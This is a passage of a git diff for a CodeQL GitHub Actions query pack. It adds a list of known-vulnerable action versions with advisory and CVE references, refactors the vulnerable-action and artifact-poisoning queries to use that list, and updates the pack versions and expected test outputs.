"7.07"] + - ["tj-actions/branch-names", "v3.6", "3e0215fc2dd14b3e395f99b5e2cc1e4d93afe1b6", "7.07"] + - ["tj-actions/branch-names", "v3.5", "b587231a9abec0da6f45dbaea42d88a9c130ee8f", "7.07"] + - ["tj-actions/branch-names", "v3.4", "dd9939e9966a18c8ce9bfcf188731c4746faf197", "7.07"] + - ["tj-actions/branch-names", "v3.3", "509c3124abef4caaeb784a5aa6f465da588e0c43", "7.07"] + - ["tj-actions/branch-names", "v3.2", "ae7cf1163ab1375b4bbf5ec6d16a686118dac27d", "7.07"] + - ["tj-actions/branch-names", "v3.1", "eb14b2dffd7af08b599b691d72b757ae607675bd", "7.07"] + - ["tj-actions/branch-names", "v3", "fdb3a42221b1ee981def2a3e7767bd3ffcda0ff7", "7.07"] + - ["tj-actions/branch-names", "v2.2", "4362da73333d3a6ecf81047f6ae055cad78fcb38", "7.07"] + - ["tj-actions/branch-names", "v2.1", "8c72ffde4df03225c479f93fef608d8cdd1042f3", "7.07"] + - ["tj-actions/branch-names", "v2", "8307330ac59a26bd125a6f99c33820dd0baf439f", "7.07"] + - ["tj-actions/branch-names", "v1", "549ca323b2179ffc0f7f828b555e88fe53da3787", "7.07"] + + # gradle/gradle-build-action + # https://github.com/advisories/GHSA-h3qr-39j9-4r5v + # CVE-2023-30853 + - ["gradle/gradle-build-action", "v2.4.1", "5056fa9d50478a14af3c9925c12ca02318659d3e", "2.4.2"] + - ["gradle/gradle-build-action", "v2.4.0", "6095a76664413da4c8c134ee32e8a8ae900f0f1f", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.3", "3fbe033aaae657f011f88f29be9e65ed26bd29ef", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.2", "fd32ae908111fe31afa48827bd1ee909540aa971", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.1", "c295a4096e1d2c453eaf1f65c6f96686e26bd8be", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.0", "356abb47e7664b5505e25d7997a5a522a17c62d9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.3.0-beta.1", "d427a379a8cc30e1c773080ce783e7e6d5167584", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.5", "cd579d970f8aec1cf0cae5f62a8e418768970015", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.4", "bf2a15ee94874758c21b91220b4d0ab84f762423", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.3", "9411346324b44f5402cbef3ac5a83a411086aa9a", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.2", "cd3cedc781988c804f626f4cd2dc51d0bdf02a12", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.1", "67421db6bd0bf253fb4bd25b31ebb98943c375e1", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0", "e88ed3e650b26bd116cfee53cf198c1f6856682d", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-rc.2", "de51428ba55149e7c6f6957a566b8759efd425de", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-rc.1", "63bcd47c1be270a660a151ce2b7848b8730f06ef", "2.4.2"] + - ["gradle/gradle-build-action", "v2.2.0-beta.1", "26ea4afa082ddf7e3e5bcf6d12283111b6f3f837", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.7", "9b814496b50909128c6a52622b416c5ffa04db49", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.6", "116ac10f8131939c7e405884cb2456067b0479e9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.5", "fec4a42eb0c83154e5c9590748ba8337949c5701", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.4", "0d13054264b0bb894ded474f08ebb30921341cee", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.3", "937999e9cc2425eddc7fd62d1053baf041147db7", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.2", "bc3340afc5e3cc44f2321809ac090d731c13c514", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.1", "b9c806c75d3cb8998f905077e62bb670e7fa7e02", "2.4.2"] + - ["gradle/gradle-build-action", "v2.1.0", "3edb3cb004617998d8cf56fe2ebf9d59602e713e", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0.1", "996094e8e808208e5738e8413b3f55d24d1c1eb7", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0.0", "4137be6a8bf7d7133955359dbd952c0ca73b1021", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.3", "4e899835b3bddb7d01d3a988e6c53d67ec8a76e2", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.2", "2a57ddf74a257b005f65f70cbf15e8e7f06292d9", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-rc.1", "db2b34260fe57577fec47305e78a20755eef0441", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.7", "cba1833ddecbbee649950c284416981928631008", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.6", "a94b9252d5d8ca83eed3f76a856f2ba046b1b3c6", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.5", "263f84178a82449371326ba2c1d781bc4b4bb9ac", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.4", "29894757f3fd1d4752e4efadb74896d39873a0ae", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.3", "c000a0b58fe0ad402c613a864ea3ed26d6e88fd0", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.2", "21dee7159020ab3140bebfd2280a6f34ef4e08ae", "2.4.2"] + - ["gradle/gradle-build-action", "v2.0-beta.1", "bebb162342333983b660d21f31c90f33950f5023", "2.4.2"] + - ["gradle/gradle-build-action", "v1.5.1", "b3afdc78a7849557ab26e243ccf07548086da025", "2.4.2"] + - ["gradle/gradle-build-action", "v1.5.0", "e0c2736e35d366e96bb202d1af817db9d562da2f", "2.4.2"] + - ["gradle/gradle-build-action", "v1.4.1", "3f3947669a3fe6883ed8dab14671bdc6042ec2d9", "2.4.2"] + - ["gradle/gradle-build-action", "v1.4.0", "579711fd3cd8691fbc0cab64db65e9c1e586658e", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.3", "90ccf054e6b9905f30f98c938bce4c6acd323b6b", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.2", "c6b57b9c8c4f72268b10f151623ce6a2855c6387", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.1", "791b98c5656178712736d390e91be71eadfe192e", "2.4.2"] + - ["gradle/gradle-build-action", "v1.3.0", "27da3e28b3c4cc84c9e7965dc2371f969e582049", "2.4.2"] + - ["gradle/gradle-build-action", "v1.2.1", "e220e54c83b8f1a546d8e6d598490231fe2bf64b", "2.4.2"] + - ["gradle/gradle-build-action", "v1.2.0", "720051268d4728af6b7e0defa8ed8097b20ef218", "2.4.2"] + - ["gradle/gradle-build-action", "v1.1.0", "d0c5f7955e911444399df5d044916a49bdccff00", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.2", "064f85c1568a6fd57b32d8f98c0dc9f237c59156", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.1", "6170f06e8dd334a7f6879781c2ed4889c4cc76bf", "2.4.2"] + - ["gradle/gradle-build-action", "v1.0.0", "2d5ca45eab01ff2ce82777ab670ff2bd5d8cf8d5", "2.4.2"] + - ["gradle/gradle-build-action", "v1", "b3afdc78a7849557ab26e243ccf07548086da025", "2.4.2"] + + # rlespinasse/github-slug-action + # https://github.com/advisories/GHSA-6q4m-7476-932w + # CVE-2023-27581 + - ["rlespinasse/github-slug-action", "v4.4.1", "102b1a064a9b145e56556e22b18b19c624538d94", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.4.0", "a362e5fb42057a3a23a62218b050838f1bacca5d", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.2", "b011e83cf8cb29e22dda828db30586691ae164e4", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.1", "00198f89920d4454e37e4b27af2b7a8eba79c530", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.3.0", "9c3571fd3dba541bfdaebc001482a49a1c1f136a", "4.4.1"] + - ["rlespinasse/github-slug-action", "v4.2.5", "0141d9b38d1f21c3b3de63229e20b7b0ad7ef0f4", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.9.0", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.8.0", "4a00c29bc1c0a737315b4200af6c6991bb4ace18", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.7.1", "5150a26d43ce06608443c66efea46fc6f3c50d38", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.7.0", "ebfc49c0e9cd081acb7ba0634d8d6a711b4c73cf", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v3.x", "2daab132aa3a6e23ea9d409f9946b3bf6468cc77", "4.4.1"] + - ["rlespinasse/github-slug-action", "v2.x", "9d2c65418d6ecbbd3c08e686997b30482e9f4a80", "4.4.1"] + - ["rlespinasse/github-slug-action", "v1.1.x", "fbf6d7b9c7af4e8d06135dbc7d774e717d788731", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.5", "0141d9b38d1f21c3b3de63229e20b7b0ad7ef0f4", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.4", "33cd7a701db9c2baf4ad705d930ade51a9f25c14", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.3", "1615fcb48b5315152b3733b7bed1a9f5dfada6e3", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.2", "4177734b38a3d59604747bf47e537ccb6bcb9cdf", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.1", "7a3b4c1766ad8e6d23ab37d33417392509ff84e2", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.2.0", "dbbe21b72b96929fe6e67275c332f43599b31274", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.1.0", "88f3ee8f6f5d1955de92f1fe2fdb301fd40207c6", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.0.1", "cd9871b66e11e9562e3f72469772fe100be4c95a", "4.4.1"] + - ["rlespinasse/github-slug-action", "4.0.0", "bd31a9f564f7930eea1ecfc8d0e6aebc4bc3279f", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.6.1", "1bf76b7bc6ef7dc6ba597ff790f956d9082479d7", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.6.0", "172fe43594a58b5938e248ec757ada60cdb17e18", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.5.1", "016823880d193a56b180527cf7ee52f13c3cfe33", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.5.0", "4060fda2690bcebaabcd86db4fbc8e1c2817c835", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.4.0", "0c099abd978b382cb650281af13913c1905fdd50", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.3.0", "d1880ea5b39f611effb9f3f83f4d35bff34083a6", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.2.0", "c8d8ee50d00177c1e80dd57905fc61f81e437279", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.1.0", "e4699e49fcf890a3172a02c56ba78d867dbb9fd5", "4.4.1"] + - ["rlespinasse/github-slug-action", "3.0.0", "6a873bec5ac11c6d2a11756b8763356da63a8939", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.2.0", "9d2c65418d6ecbbd3c08e686997b30482e9f4a80", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.1.1", "72cfc4cb1f36c102c48541cb59511a6267e89c95", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.1.0", "1172ed1802078eb665a55c252fc180138b907c51", "4.4.1"] + - ["rlespinasse/github-slug-action", "2.0.0", "ca9a67fa1f1126b377a9d80dc1ea354284c71d21", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.2.0", "fbf6d7b9c7af4e8d06135dbc7d774e717d788731", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.1.1", "242e04c2d28ac5db296e5d8203dfd7dc6bcc17a9", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.1.0", "881085bcae8c3443a89cc9401f3e1c60fb014ed2", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.2", "a35a1a486a260cfd99c5b6f8c6034a2929ba9b3f", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.1", "e46186066296e23235242d0877e2b4fe54003d54", "4.4.1"] + - ["rlespinasse/github-slug-action", "1.0.0", "9671420482a6e4c59c06f2d2d9e0605e941b1287", "4.4.1"] + + # Azure/setup-kubectl + # https://github.com/advisories/GHSA-p756-rfxh-x63h + # CVE-2023-23939 + - ["Azure/setup-kubectl", "v2.1", "6025c840858f1afa584a5190a4426c338f59e503", "3"] + - ["Azure/setup-kubectl", "v2.0", "7ad2aa66bb42774adf65a0c580fbc96b2dadd747", "3"] + - ["Azure/setup-kubectl", "v1", "a625ca209b0faaa8871dac8fb5f50ee4b4d22622", "3"] + + # gajira-create + # https://github.com/advisories/GHSA-4xqx-pqpj-9fqw + # CVE-2020-14188 + - ["atlassian/gajira-create", "v2.0.0", "77d13eab156b8ad1c08c0655011b8a442c502998", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.3", "14c3d657c383981ee595d9750f68d7e4e77d64d0", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.1", "2cd32e0738e2b31717e7119717fed83e482d2a36", "2.0.1"] + - ["atlassian/gajira-create", "v1.0.0", "f11e88bf4a1358e741ac282bc198a4f21cb719a1", "2.0.1"] + + # hashicorp/vault-action + # https://github.com/advisories/GHSA-4mgv-m5cm-f9h7 + # CVE-2021-32074 + - ["hashicorp/vault-action", "v2.1.2", "5e5c06a3c8e96b7c4757fe7a10e03469cdbd07bb", "2.2.0"] + - ["hashicorp/vault-action", "v2.1.1", "2fb78ab91e55be5479aacf74f7b451eab79773a4", "2.2.0"] + - ["hashicorp/vault-action", "v2.1.0", "2ca76a4465bca4f71fc88320e67551a287f7eaec", "2.2.0"] + - ["hashicorp/vault-action", "v2.0.1", "952d5d48e4448ad364651cc473aeccc25bd169d9", "2.2.0"] + - ["hashicorp/vault-action", "v2.0.0", "e27b45646f82a319c8157e545e24b7588510a397", "2.2.0"] + - ["hashicorp/vault-action", "v1.0.1", "22e3f3e09e3baba4d6cc62823175d21fafe4e30a", "2.2.0"] + - ["hashicorp/vault-action", "v1.0.0", "727494f451d57cbfc932a1d8bce1b0a027d99a8b", "2.2.0"] + - ["hashicorp/vault-action", "v0.10.2", "9878eba70ad6c6e21a01bd1e2debd3f3b7cbc46e", "2.2.0"] + - ["hashicorp/vault-action", "v0.10.1", "567ec72c33597ee9feca8bed4611a8ace38330c2", "2.2.0"] + - ["hashicorp/vault-action", "v0.10.0", "5c464962be8937589f883cf209d21b3982c92360", "2.2.0"] + - ["hashicorp/vault-action", "v0.9.0", "50ece41861b565239528923369690fc43cc0050b", "2.2.0"] + - ["hashicorp/vault-action", "v0.8.0", "4ab6f6070f5be6702101c9736961beb8105e8708", "2.2.0"] + - ["hashicorp/vault-action", "v0.7.0", "4edbc9a77a84bd34b0da2e8b8d527871b6103aae", "2.2.0"] + - ["hashicorp/vault-action", "v0.6.2", "7d1d7d26adb265e6ebc6018ce2b92be7c5a7c63c", "2.2.0"] + - ["hashicorp/vault-action", "v0.6.1", "f9753d75ef0cdafe621cda2323b5dcc4d673d01a", "2.2.0"] + - ["hashicorp/vault-action", "v0.6.0", "0188d9d223dac8b24b94b04d3253bf0fe0365ca7", "2.2.0"] + - ["hashicorp/vault-action", "v0.5.0", "f229481670b4719a05f01e8fd8478c191a373c43", "2.2.0"] + - ["hashicorp/vault-action", "v0.4.0", "3b9239de79207bf3fba80a16916f257918ab1d15", "2.2.0"] + - ["hashicorp/vault-action", "v0.3.1", "ab4dc55b2ecc6eb5926c5caffa45eaf0c3ad735a", "2.2.0"] + - ["hashicorp/vault-action", "v0.3.0", "3747195c5f2848179bf615690b3e66e69a5e4dc7", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.2", "da9a93f3f5bec24febf304139a6cbe61f0f8ad5e", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.1", "6784ab38963b266384880094ff02eb13334802f4", "2.2.0"] + - ["hashicorp/vault-action", "v0.2.0", "6784ab38963b266384880094ff02eb13334802f4", "2.2.0"] + - ["hashicorp/vault-action", "v0.1.0", "19c0b21a1ddb75543178ac4a250b5b7cff7fd55a", "2.2.0"] + + # check-spelling/check-spelling + # https://github.com/advisories/GHSA-g86g-chm8-7r2p + # CVE-2021-32724 + - ["check-spelling/check-spelling", "v0.0.18", "08f08a6ff6b9ebae06cb8fe463374a8a5a37e03c", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.17-alpha", "ead83f4596b4aac06f698b501b5beb3218f6214d", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.16-alpha", "5f7f35b25e6bce7b1e5a8f226369a86ab19a623e", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.15-alpha", "d8f2d9ec30e38ffae03410088062714ac04c36cd", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.14-alpha", "67ea89eaff703694453dbfd346c4c31dfab646fc", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.13-alpha", "a9db57b850b66cb664373f19f6628c4ee39fbcb5", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.12-alpha", "22b3d11338aea9482eda87725ab15b8862de4061", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.11-alpha", "10d8401e72f7b4752a765b61ecbd1539394d6f4e", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.10-alpha", "c79ba85e2b8e45ef0a8da9eb0d16e7f2135ad2c6", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.9-alpha", "13d6bbcc0a082113d1c2d33ea41fcbe915e62de9", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.8-alpha", "6505ab5f1ebbe080fc072ea3cf68bac289f419ac", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.7-alpha", "a27e3104c5c8d69c2986d22c938e679ec0f1b2c7", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.6-alpha", "8a7dfc447cd58195531f7c313f6ff693f0e2eb89", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.5-alpha", "e584b835f290270af78538013634f348d6cc7398", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.4-alpha", "cb465b08587798aa788dfd9bc345c2c982ac9e29", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.3-alpha", "b8e280ae90b28f1aadc50f93073aa6450afe820d", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.2-alpha", "8e32de8a016bc4dce4170ec36881cbb315f94ff4", "0.0.19"] + - ["check-spelling/check-spelling", "0.0.1-alpha", "d2d0ee06c72600982d2f80bca187ce90fee6ad94", "0.0.19"] diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 93f6688d2b41..856fbaebb193 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.27 +version: 0.1.28 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql index 16404edc5000..c0a81b66a480 100644 --- a/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql +++ b/ql/src/Security/CWE-1395/UseOfKnownVulnerableAction.ql @@ -12,37 +12,8 @@ */ import actions +import codeql.actions.security.UseOfKnownVulnerableActionQuery -abstract class KnownVulnerableAction extends UsesStep { - abstract string getFixedVersion(); -} - -class ActionsDownloadArtifact extends KnownVulnerableAction { - ActionsDownloadArtifact() { - this.getCallee() = "actions/download-artifact" and - ( - this.getVersion() = - [ - "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", - "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", - "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", - ] - or - this.getVersion() - .matches([ - "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", - "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", - "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", - "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", - "18f0f591", "18f0f591", - ] + "%") - ) - } - - override string getFixedVersion() { result = "4.1.7" } -} - -// gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate from KnownVulnerableAction step select step, "The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@", step, diff --git a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql index bf7623ef2600..a50c47a97935 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoningPathTraversal.ql @@ -14,28 +14,15 @@ import actions import codeql.actions.security.PoisonableSteps +import codeql.actions.security.UseOfKnownVulnerableActionQuery -from UsesStep download +from UsesStep download, KnownVulnerableAction vulnerable_action where - download.getCallee() = "actions/download-artifact" and + vulnerable_action.getVulnerableAction() = download.getCallee() and download.getCallee() = "actions/download-artifact" and ( - download.getVersion() = - [ - "4.1.6", "4.1.5", "4.1.4", "4.1.3", "4.1.2", "4.1.1", "4.1.0", "4.0.0", "3.0.2", "3.0.1", - "3.0.0", "3", "3-node20", "2.1.1", "2.1.0", "2.0.10", "2.0.9", "2.0.8", "2.0.7", "2.0.6", - "2.0.5", "2.0.4", "2.0.3", "2.0.2", "2.0.1", "2.0", "2", "1.0.0", "1", "1.0.0", - ] - or - download - .getVersion() - .matches([ - "9c19ed7f", "8caf195a", "c850b930", "87c55149", "eaceaf80", "6b208ae0", "f44cd7b4", - "7a1cd321", "9bc31d5c", "9782bd6a", "fb598a63", "9bc31d5c", "246d7188", "cbed621e", - "f023be2c", "3be87be1", "158ca71f", "4a7a7112", "f144d3c3", "f8e41fbf", "c3f5d00c", - "b3cedea9", "80d2d402", "381af06b", "1ac47ba4", "1de1dea8", "cbed621e", "18f0f591", - "18f0f591", "18f0f591", - ] + "%") + download.getVersion() = vulnerable_action.getVulnerableVersion() or + download.getVersion() = vulnerable_action.getVulnerableSha() ) and ( // exists a poisonable upload artifact in the same workflow diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 6ceb57f09461..73dff5a1dc8c 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.27 +version: 0.1.28 groups: [actions, queries] suites: codeql-suites extractor: javascript diff --git a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected index 4749fc358173..a89ef0bfbe5e 100644 --- a/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected +++ b/ql/test/query-tests/Security/CWE-1395/UseOfKnownVulnerableAction.expected @@ -1,9 +1,9 @@ -| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 4.1.7 | -| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:10:9:11:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:10:9:11:6 | Uses Step | v1 | .github/workflows/test1.yml:10:9:11:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:10:9:11:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:11:9:12:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:11:9:12:6 | Uses Step | v1.0.0 | .github/workflows/test1.yml:11:9:12:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:11:9:12:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:12:9:13:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:12:9:13:6 | Uses Step | v2 | .github/workflows/test1.yml:12:9:13:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:12:9:13:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:13:9:14:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:13:9:14:6 | Uses Step | v2.1.0 | .github/workflows/test1.yml:13:9:14:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:13:9:14:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:14:9:15:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:14:9:15:6 | Uses Step | v3 | .github/workflows/test1.yml:14:9:15:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:14:9:15:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:15:9:16:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:15:9:16:6 | Uses Step | v3.0.2 | .github/workflows/test1.yml:15:9:16:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:15:9:16:6 | Uses Step | 4.1.7 | +| .github/workflows/test1.yml:16:9:17:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:16:9:17:6 | Uses Step | v4.1.0 | .github/workflows/test1.yml:16:9:17:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:16:9:17:6 | Uses Step | 4.1.7 | | .github/workflows/test1.yml:17:9:18:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 87c55149d96e628cc2ef7e6fc2aab372015aec85 | .github/workflows/test1.yml:17:9:18:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:17:9:18:6 | Uses Step | 4.1.7 | | .github/workflows/test1.yml:18:9:19:6 | Uses Step | The workflow is using a known vulnerable version ($@) of the $@ action. Update it to $@ | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 9bc31d5ccc31df68ecc42ccf4149144866c47d8a | .github/workflows/test1.yml:18:9:19:6 | Uses Step | actions/download-artifact | .github/workflows/test1.yml:18:9:19:6 | Uses Step | 4.1.7 | diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index 70eb169860e6..665e9626b247 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,20 +1,20 @@ -| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref '2', not a 